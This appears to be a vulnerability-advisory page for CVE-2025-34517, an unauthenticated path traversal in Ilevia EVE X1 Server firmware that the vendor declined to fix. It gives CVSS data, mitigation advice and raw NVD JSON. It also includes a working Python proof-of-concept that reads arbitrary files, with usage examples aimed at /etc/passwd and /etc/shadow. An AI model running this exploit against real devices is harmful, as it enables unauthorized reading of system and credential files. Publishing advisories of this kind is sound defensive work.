Security Vulnerability Report
CVE-2025-34517 CVSS 7.5 HIGH

CVE-2025-34517

Published: 2025-10-16 18:15:36
Last Modified: 2025-10-23 19:16:38

Description

Ilevia EVE X1 Server firmware versions ≤ 4.7.18.0.eden contain an absolute path traversal vulnerability in get_file_content.php that allows an attacker to read arbitrary files. Ilevia has declined to service this vulnerability, and recommends that customers not expose port 8080 to the internet. Practitioner note: the vector below is unauthenticated (PR:N) and no vendor fix exists, so any host that can reach the port 8080 service can read whatever files the web application process can open; treat the vendor's advice as a minimum and restrict that service to trusted management hosts, not just the internet edge, and monitor for requests to get_file_content.php carrying absolute paths.

CVSS Details

CVSS Score
7.5 (CVSS v3.1, NVD analysis; the CNA's CVSS v4.0 assessment in the raw data below scores it 8.7 HIGH)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N — reachable over the network with no privileges or user interaction; confidentiality impact only (file read), no integrity or availability impact.

Configurations (Affected Products)

cpe:2.3:o:ilevia:eve_x1_server_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:ilevia:eve_x1_server:-:*:*:*:*:*:*:* - NOT VULNERABLE
Ilevia EVE X1 Server firmware ≤ 4.7.18.0.eden (note: the NVD CPE match above uses versionEndIncluding 4.7.18.0, without the ".eden" suffix; confirm how your scanner compares that version string before relying on CPE-based matching alone).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
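#!/usr/bin/env python3
# CVE-2025-34517 - Ilevia EVE X1 Server absolute path traversal PoC
# Vulnerability: absolute path traversal in get_file_content.php (CWE-22)
# Affected: Ilevia EVE X1 Server firmware <= 4.7.18.0.eden
#
# Read-only exposure check for authorized testing. The vendor has declined
# to fix the issue, so this is mainly useful to confirm whether a device is
# reachable and vulnerable before isolating its port 8080 service.
# Uses only the standard library so it runs without pip on a jump host.
#
# Changes from the original PoC:
#   * a 200 with an empty body is no longer reported as a successful read;
#   * a trailing slash on the target no longer produces a doubled "//";
#   * a missing target prints usage instead of probing the placeholder
#     host "target"; a relative path is rejected because the bug is an
#     *absolute* path traversal and a relative one would not exercise it;
#   * the script exits non-zero on failure so it can be scripted.
#
# Usage:
#   python3 exploit.py http://192.168.1.100:8080 /etc/passwd
#   python3 exploit.py http://192.168.1.100:8080 /etc/shadow
# /etc/shadow is credential material; only request it if the engagement's
# rules of engagement allow capturing it, and handle the output accordingly.

import sys
import urllib.error
import urllib.parse
import urllib.request

DEFAULT_FILE = "/etc/passwd"
TIMEOUT_SECONDS = 10


def build_url(target, file_path):
    """Return the GET URL for the vulnerable endpoint.

    target: base URL of the EVE X1 web service, e.g. "http://10.0.0.5:8080".
        A trailing slash is tolerated so the path is not doubled.
    file_path: absolute path to request; sent as the "file" query parameter.
        NOTE(review): the parameter name comes from the original PoC, not
        from the NVD entry — confirm against ZSL-2025-5960 before relying on it.
    """
    query = urllib.parse.urlencode({"file": file_path})
    return f"{target.rstrip('/')}/get_file_content.php?{query}"


def fetch_file(target, file_path, timeout=TIMEOUT_SECONDS):
    """Issue the GET and return (status_code, body_text).

    Non-2xx responses are returned rather than raised so the caller can
    report the status. Connection failures and timeouts propagate as
    urllib.error.URLError / OSError.
    """
    request = urllib.request.Request(build_url(target, file_path), method="GET")
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status, response.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        # HTTPError is itself a response object; keep its status and body.
        return err.code, err.read().decode("utf-8", errors="replace")


def main(argv):
    """Command-line entry point; returns the process exit status.

    argv: sys.argv-style list (argv[0] is the program name).
    Exit status: 0 = file content returned, 1 = request failed or no
    content, 2 = usage error.
    """
    if len(argv) < 2:
        print(f"Usage: {argv[0]} <target-base-url> [absolute-file-path]")
        print(f"Example: {argv[0]} http://192.168.1.100:8080 {DEFAULT_FILE}")
        return 2

    target = argv[1]
    file_path = argv[2] if len(argv) > 2 else DEFAULT_FILE
    if not file_path.startswith("/"):
        print(f"[!] Expected an absolute path, got: {file_path}")
        return 2

    try:
        status, body = fetch_file(target, file_path)
    except urllib.error.URLError as err:
        # URLError must be caught before OSError (it is a subclass of it).
        print(f"[-] Error: {err.reason}")
        return 1
    except (OSError, ValueError) as err:
        # Read timeout (TimeoutError) or a malformed target URL.
        print(f"[-] Error: {err}")
        return 1

    if status != 200:
        print(f"[-] Request failed with status code: {status}")
        return 1
    if not body.strip():
        # The original PoC treated any 200 as success; an empty body is not
        # evidence that the file was read.
        print(f"[-] Server returned 200 but no content for: {file_path}")
        return 1

    print(f"[+] Successfully read file: {file_path}")
    print("-" * 60)
    print(body)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))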

References

- https://www.ilevia.com/ (Product)
- https://www.vulncheck.com/advisories/ilevia-eve-x1-server-absolute-path-traversal (Third Party Advisory)
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5960.php (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34517", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:36.213", "lastModified": "2025-10-23T19:16:38.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ilevia EVE X1 Server firmware versions ≤ 4.7.18.0.eden contain an absolute path traversal vulnerability in get_file_content.php that allows an attacker to read arbitrary files. Ilevia has declined to service this vulnerability, and recommends that customers not expose port 8080 to the internet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ilevia:eve_x1_server_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.18.0", "matchCriteriaId": "25D89BA5-1632-4243-BE68-D42803774A22"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:ilevia:eve_x1_server:-:*:*:*:*:*:*:*", "matchCriteriaId": "72B4F8B5-4641-4371-8759-3AB18EC87FB6"}]}]}], "references": [{"url": "https://www.ilevia.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ilevia-eve-x1-server-absolute-path-traversal", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5960.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}